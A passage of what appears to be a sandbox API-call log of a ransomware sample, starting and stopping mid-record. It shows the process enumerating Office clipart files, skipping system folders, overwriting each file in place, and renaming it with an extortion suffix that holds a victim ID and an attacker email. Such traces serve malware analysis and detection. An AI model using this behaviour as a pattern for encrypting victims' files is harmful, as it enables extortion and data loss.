lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01838_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01838_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3652) returned 1 [0099.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe40) returned 0x205850 [0099.654] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0xe40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0xe40, lpOverlapped=0x0) returned 1 [0099.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.748] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0xe40, lpOverlapped=0x0) returned 1 [0099.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.749] CloseHandle (hObject=0x314) returned 1 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0099.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0099.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0099.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0099.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01838_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01838_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01838_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01838_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.751] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x446, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01839_.GIF", cAlternateFileName="")) returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2=".") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="..") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="...") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="windows") returned -1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="recovery") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="perflogs") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="documents and settings") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="system volume information") returned 1 [0099.751] lstrcmpiW (lpString1="WB01839_.GIF", lpString2="msocache") returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01839_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01839_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01839_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01839_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01839_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01839_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0099.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01839_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01839_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.753] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1094) returned 1 [0099.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x440) returned 0x230a00 [0099.753] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x440, lpOverlapped=0x0) returned 1 [0099.754] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.754] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x440, lpOverlapped=0x0) returned 1 [0099.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.755] CloseHandle (hObject=0x314) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0099.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0099.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0099.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0099.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0099.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.755] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01839_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01839_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01839_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01839_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0099.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0099.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.756] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fe, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01840_.GIF", cAlternateFileName="")) returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2=".") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="..") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="...") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="windows") returned -1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="recovery") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="perflogs") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="documents and settings") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.756] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="system volume information") returned 1 [0099.757] lstrcmpiW (lpString1="WB01840_.GIF", lpString2="msocache") returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01840_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01840_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01840_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01840_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01840_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01840_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0099.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01840_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01840_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.758] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1534) returned 1 [0099.758] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f0) returned 0x2332c0 [0099.758] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5f0, lpOverlapped=0x0) returned 1 [0099.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.760] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5f0, lpOverlapped=0x0) returned 1 [0099.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0099.760] CloseHandle (hObject=0x314) returned 1 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0099.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0099.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0099.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0099.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01840_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01840_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01840_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01840_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0099.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.761] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01842_.GIF", cAlternateFileName="")) returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2=".") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="..") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="...") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="windows") returned -1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="recovery") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="perflogs") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="documents and settings") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.761] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="system volume information") returned 1 [0099.762] lstrcmpiW (lpString1="WB01842_.GIF", lpString2="msocache") returned 1 [0099.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01842_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01842_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01842_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0099.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01842_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01842_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01842_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0099.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01842_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01842_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.762] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1900) returned 1 [0099.762] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x760) returned 0x20c6c0 [0099.762] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0099.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.764] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0099.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.764] CloseHandle (hObject=0x314) returned 1 [0099.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.764] 